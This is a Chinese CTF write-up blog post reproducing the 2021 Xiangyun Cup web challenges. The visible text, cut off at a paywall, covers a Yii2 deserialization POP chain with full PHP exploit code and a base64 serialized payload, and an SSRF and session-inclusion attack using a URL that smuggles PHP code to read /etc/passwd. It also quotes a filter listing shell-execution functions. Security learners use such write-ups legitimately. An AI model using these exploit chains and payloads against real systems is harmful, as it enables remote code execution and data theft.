祥云杯2021web writeup

最新推荐文章于 2023-04-01 21:26:28 发布
最新推荐文章于 2023-04-01 21:26:28 发布
阅读量2.8k 收藏 3
点赞数 1
分类专栏: CTF Writeup 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41636200/article/details/119958733
版权

太菜了,一个web都没做出来。接下来是复现。好好学习一下大佬们的姿势,也记录一下。篇幅较长,其中有对于源码等的分析,适合新手。大佬勿喷。

目录

web1 ezyii

考点: yii反序列化的链子

web2 安全检测

考点 :SSRF、session条件竞争

方法1

方法2

方法3

方法4

关于session

web3 crawler_z

考点:zombie 的Nday漏洞,变量覆盖

关于zombie的Nday漏洞

关于变量覆盖漏洞

 关于302跳转

web4 PackageManager2021

考点:sql注入

方法1 直接报错出密码

方法2 脚本爆破

web5 层层穿透

考点:Apache Flink 任意Jar包上传导致远程代码执行漏洞、fastjson反序列化

关于Apache Flink漏洞

 关于fastjson反序列化

web6 Secrets_Of_Admin

考点:SSRF

         考点: yii反序列化的链子

考点 :SSRF、session条件竞争

方法1

方法2

方法3

方法4

关于session

参考师傅们的wp,网上有的,侵权删。

祥云杯2021 By W&M(WEB)部分

【wp】第二届“祥云杯” by EDI安全

祥云杯wp by Syclover - HedgeDoc

2021第二届祥云杯WP - n03tAck

【技术分享】第二届"祥云杯" WEB WP (qq.com)

祥云杯-WriteUp (qq.com)

web1 ezyii

考点: yii反序列化的链子

比赛给了源码,打开源码开始审计。

当时网上看了很多yii的链子,包括CVE-2020-15148,还有先知上这个最新的链子,都没什么思路,直到看到大佬的wp,发现先知上还有个yii的四条链子利用方法。

先知第一个链子

Yii2反序列化RCE 新POP链 - 先知社区 (aliyun.com)

先知第二个链子,直接给了payload。愣是没搜出来,后来听说是因为影响到比赛,作者事先删了。

yii 2.0.42 最新反序列化利用全集 - 先知社区 (aliyun.com)

通过审计代码可以知道,这里还是用的是在Codeception\Extension目录下的RunProcess.php文件 ,这里的__destruct()会遍历$this->processes,那我们可以通过$this->processes变量遍历时赋值的$process来调用__toString() 在

$this->output->debug('[RunProcess] Stopping ' . $process->getCommandLine());

中 $process->getCommandLine()会返回一个值,而'.'作为字符串链接符,使$process被当作字符串进行了使用,所以触发了__toString()

所以我们搜索__toString()发现,在AppendStream.php里面含有这个函数,调用了$this->rewind(),跟进rewind发现调用了seek()函数,继续跟进发现$stream参数又走向了CachingStream.php类中的rewind方法,

在这里getSize()是调用的PumpStream.php中的方法

但我们先不管,在seek方法中,这里调用了read方法,我们跟进read方法,发现这里继续跳转到了PumpStream.php中的read方法。

然后查看PumpStream.php中的read方法,发现这里调用了pump方法,跟进pump函数,发现了call_user_func(),结合返回值可控的__call()方法,实现命令执行。

至此反序列化POP链分析完成,构造exp如下

<?php
namespace Codeception\Extension{
    use Faker\DefaultGenerator;
    use GuzzleHttp\Psr7\AppendStream;
    class  RunProcess{
        protected $output;
        private $processes = [];
        public function __construct(){
            $this->processes[]=new DefaultGenerator(new AppendStream());
            $this->output=new DefaultGenerator('jiang');
        }
    }
    echo base64_encode(serialize(new RunProcess()));
}


namespace Faker{
    class DefaultGenerator
{
    protected $default;


    public function __construct($default = null)
    {
        $this->default = $default;
}
}
}
namespace GuzzleHttp\Psr7{
    use Faker\DefaultGenerator;
    final class AppendStream{
        private $streams = [];
        private $seekable = true;
        public function __construct(){
            $this->streams[]=new CachingStream();
        }
    }
    final class CachingStream{
        private $remoteStream;
        public function __construct(){
            $this->remoteStream=new DefaultGenerator(false);
            $this->stream=new  PumpStream();
        }
    }
    final class PumpStream{
        private $source;
        private $size=-10;
        private $buffer;
        public function __construct(){
            $this->buffer=new DefaultGenerator('j');
            include("closure/autoload.php");
            $a = function(){phpinfo();};
            $a = \Opis\Closure\serialize($a);
            $b = unserialize($a);
            $this->source=$b;
        }
    }
}

paylaod

TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjI6e3M6OToiACoAb3V0cHV0IjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjU6ImppYW5nIjt9czo0MzoiAENvZGVjZXB0aW9uXEV4dGVuc2lvblxSdW5Qcm9jZXNzAHByb2Nlc3NlcyI7YToxOntpOjA7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7TzoyODoiR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbSI6Mjp7czozNzoiAEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0Ac3RyZWFtcyI7YToxOntpOjA7TzoyOToiR3V6emxlSHR0cFxQc3I3XENhY2hpbmdTdHJlYW0iOjI6e3M6NDM6IgBHdXp6bGVIdHRwXFBzcjdcQ2FjaGluZ1N0cmVhbQByZW1vdGVTdHJlYW0iO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO2I6MDt9czo2OiJzdHJlYW0iO086MjY6Ikd1enpsZUh0dHBcUHNyN1xQdW1wU3RyZWFtIjozOntzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0Ac291cmNlIjtDOjMyOiJPcGlzXENsb3N1cmVcU2VyaWFsaXphYmxlQ2xvc3VyZSI6MTc4OnthOjU6e3M6MzoidXNlIjthOjA6e31zOjg6ImZ1bmN0aW9uIjtzOjIzOiJmdW5jdGlvbigpe1xwaHBpbmZvKCk7fSI7czo1OiJzY29wZSI7czoyNjoiR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0iO3M6NDoidGhpcyI7TjtzOjQ6InNlbGYiO3M6MzI6IjAwMDAwMDAwNmVlZGE5YjkwMDAwMDAwMDQxOGMxZmJkIjt9fXM6MzI6IgBHdXp6bGVIdHRwXFBzcjdcUHVtcFN0cmVhbQBzaXplIjtpOi0xMDtzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0AYnVmZmVyIjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjE6ImoiO319fX1zOjM4OiIAR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO319fX0=

运行结果

web2 安全检测

考点 :SSRF、session条件竞争

打开界面发现是个登录界面,任意用户都可以登录,接着就是一个输入框,让你对链接进行安全检测。post check2.php,会file_get_contents(报错得知)验证一个url是否可以访问,然后get preview.php可以查看这个url的内容。

对于这种题,大佬们有下面几种方法

方法1

通过fuzz可知,传入的url任意位置包含http或者http:// 即可进行读取。所以直接传入/var/www/html/http://../check2.php 就可以读取本地文件。

通过读取/etc/apache2/apache2.conf。我们可以看到

<Directory "/var/www/html/admin">
    Options +Indexes +FollowSymLinks +ExecCGI
        deny from all
        Allow from 127.0.0.1
</Directory>

因此找到/admin目录,因为开启了目录遍历,我们可以通过ssrf找到文件名/admin/include123.php,就可以看到源码, 通过源码分析得知是session条件竞争。

include123.php可以包含本地session文件,check2.php文件把url存储在session中,login.php则对存入的session的用户名进行了过滤,但是过滤不多,因此可以让url是

http://www.example.com/?<?php $a='read'.'fi'.'le';$a('/etc/passwd');?>aaa

的方式让session包含命令执行的payload。然后包含这个session实现代码执行。

方法2

通过ssrf传 http://127.0.0.1/admin 访问到了include123.php文件。

 查看文件代码

<?php
$u=$_GET['u'];
$pattern = "\/\*|\*|\.\.\/|\.\/|load_file|outfile|dumpfile|sub|hex|where";
$pattern .= "|file_put_content|file_get_content|fwrite|curl|system|eval|assert";
$pattern .="|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
$pattern .="|`|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|assert|pcntl_exec|http|.php|.ph|.log|\@|:\/\/|flag|access|error|stdout|stderr";
$pattern .="|file|dict|gopher";
//累了累了,饮茶先
$vpattern = explode("|",$pattern);
foreach($vpattern as $value){    
    if (preg_match( "/$value/i", $u )){
        echo "检测到恶意字符";
        exit(0);
    }
}
include($u);
show_source(__FILE__);
?>

可以发现包含了$u参数,直接文件包含session就可以了。直接get

http://127.0.0.1/
最低0.47元/天 解锁文章
「已注销」
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[2021东华]Web Writeup1
08-03
Java 反序列化漏洞及利用 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,发生在 Java 对象的序列化和反序列化过程中。该漏洞可以导致攻击者执行恶意代码,盗取敏感信息,或者控制服务器。 ...
2021强网Writeup--by Nu1L Team.pdf
06-15
第五届“强网”全国网络安全挑战赛
祥云2021 Web简单题wp
feng的博客
08-23 577
前言 千言万语汇成一句:我真是太菜了。事实证明只会个php在卷成这样的ctf比赛里面只能挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打挨打。 不会Java和js直接下线,只能卑微的做最简单题
祥云2021 Web复现
feng的博客
08-25 1839
前言 正好buuctf上放了那三道js的题目,就正好复现了一下,学习学习。 cralwer_z 有注册登录,更新个人信息还有爬虫的功能。但是想使用爬虫功能会受到限制: if (/^https:\/\/[a-f0-9]{32}\.oss-cn-beijing\.ichunqiu\.com\/$/.exec(user.bucket)) { return res.json({ message: "Sorry but our remote oss server is under mainte
2021祥云web 部分wp
fmyyy1的博客
08-23 721
ezyii 说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路 看到RunProcess类 <?php namespace Codeception\Extension; class RunProcess { protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ
2021祥云
qq_48511129的博客
12-13 1043
安全检测 尝试用admin/admin登录,发现成功登录 输入一个百度的地址,发现跳转到了百度。 于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转 网站很多都有一个admin后台目录,接着尝试能不能跳转到该目录 发现成功跳转 看到include123.php文件,于是接着跳转到该文件下面 发现了一些php代码 发现对get传的参数过滤了很多东西。本地文件包含,远程文件包含命令执行等基本都过滤了。 暑假做题的时候做到了一道类似的题,把这些都过滤了,他用的方法是用session文件包含,因为
第二届“祥云”网络安全大赛暨吉林省第四届大学生网络安全大赛 WriteUp 2021祥云misc
mumuzi的博客
08-23 4292
层层取证 层层套娃取证(确信) 给了一个内存和一个虚拟磁盘的取证,先看磁盘,取证大师打开提示存在bitlocker加密 用Passware Kit Forensic 2021 v1 (64-bit)能直接梭出来bitlocker的秘钥 方法是把001解压出来,然后把2.ntfs放进去,再选择有内存镜像,导入这道题的内存镜像,然后等待…… 当然之后也发现内存中也可以找到,但是已经不重要 得到549714-116633-006446-278597-176000-708532-618101-131406 解开发
2023 强网 Writeup
最新发布
01-29
2023 强网 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
0RAYS-祥云writeup .pdf
09-05
这篇writeup涉及的是一个网络安全竞赛,名为"0RAYS-祥云",主要涵盖了安全开发、业务安全、信息安全研究以及安全运营等领域的知识。在比赛中,参赛者需要解决一系列安全问题,包括Web Command命令执行和数据安全。...
029-从Fastjson绕WAF到打穿网闸.pdf
09-20
029-从Fastjson绕WAF到打穿网闸.pdf
requests.post()和session.post()的区别
totorobig的博客
12-12 1万+
requests.post()的调用过程为: 1.调用requests.post方法 2.再调用requests.request 使用上下文方式创建了一个Session对象,并调用其session.request.post方法,而它的上下文实现如下: 由以上源码可以看出,requests.post在调用完成后就关闭了connect,所以cookies随着connect消亡而消亡 接下来让我们再看看Session.post()的调用过程 import requests r = requests.sess
春秋云镜靶场记录
wanan的博客
01-19 437
春秋云镜靶场记录
2023数字中国创新大赛网络数据安全赛道数据安全产业人才能力挑战赛
wha1e的博客
04-01 1880
纯看题
第五届强网全国网络安全挑战赛writeup
渗透测试研究中心
12-23 7828
Web1.[强网先锋]寻宝下发赛题,访问链接如下:该题需要你通过信息 1 和信息 2 分别获取两段 Key 值,输入 Key1 和 Key2 然后解密。Key1之代码审计点击“信息1”,发现是代码审计:完整源码如下:<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__...
Spring Data JDBC示例与使用自定义 ID 插入记录
allway2的博客
10-14 2346
什么是春季数据 JDBC项目属于弹簧数据系列,并为基于 JDBC 的数据访问层提供抽象。它提供了易于使用的对象关系映射 (ORM) 框架来处理数据库。这意味着,春季数据JDBC支持使用实体对象和存储库。但是,它减少了JPA支持的引入的许多复杂性。为了使数据访问层尽可能简单,它省略了一些JPA功能,如延迟加载,实体缓存等。因此,它可以毫不费力地用于我们打算对实体执行纯 JDBC 操作的地方。与任何其他春季项目一样,可以通过添加自己的初学者依赖项,在春季启动中启用春季数据JDBC。
requests模拟登陆的三种方式(cookie,session)
热门推荐
Ghjkku的博客
10-12 4万+
1.实例化session,使用session发送post请求,然后在使用session.get获取登陆后的信息。一套cookie和session往往对应一个用户,请求太快,请求次数太多,容易被识别为爬虫。不需要建立session对象来获取cookie直接复制浏览器cookie的情况。cookie保存在浏览器中,很多浏览器限制一个站点最多保存20个cookie。但是有时为了获取登陆的页面,必须发送带有cookie的请求。3,配合其他程序, 其他程序获取cookie。3,将cookies字典化,然后调用。
signature=0fdde99449705347b1bc3148e0519684,yarn.lock
weixin_32204013的博客
05-29 2009
# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY.# yarn lockfile v1"@babel/code-frame@7.0.0-beta.44":version "7.0.0-beta.44"resolved "http://registry.npm.taobao.org/@babel/code-frame/do...
Python requests 技巧总结
sdulsj的博客
11-08 1740
# 1:保持请求之间的Cookies import requests self.session = requests.Session() self.session.get(login_url) # 可以保持登录态 # 2:请求时,会加上headers self.session.get(url, params, headers=headers) #在构造函数中,这样设置是全局的。 # 设置请求头
linux的fscan
01-17
fscan在Linux中是一个文件扫描函数,用于扫描文件并查找特定的字符串或模式。它是C语言标准库中的函数之一,通常用于读取文件内容并进行文本处理。 fscan函数的主要作用是从文件中读取指定格式的数据或字符串,并根据提供的格式字符串进行解析。它可以按照格式符指定的格式从文件中读取数据,并将这些数据存储到对应的变量中。 fscan函数具有灵活性和强大的功能,可以根据所需的操作来选择不同的格式符。例如,使用"%s"可以读取字符串,"%d"可以读取整数,"%f"可以读取浮点数等。通过指定不同的格式符,我们可以从文件中读取不同类型的数据。 此外,fscan函数还可以用于处理文件中的重复数据。通过使用循环,可以多次调用fscan函数以便读取文件中的多行数据。每次调用fscan函数,它将从文件中读取下一行的数据,并将其存储到所定义的变量中。这样,我们就可以逐行处理文件中的数据。 需要注意的是,在使用fscan函数时,我们需要确保文件的打开和关闭操作正确,以免出现文件相关的错误。正确地使用fscan函数将帮助我们有效地读取和处理文件中的数据。 总而言之,fscan是Linux中一个强大的文件扫描函数,可以用于读取和处理文件中的数据。它具有灵活性和功能丰富的特点,可以根据指定的格式从文件中读取相应类型的数据,并用于文件的文本处理操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值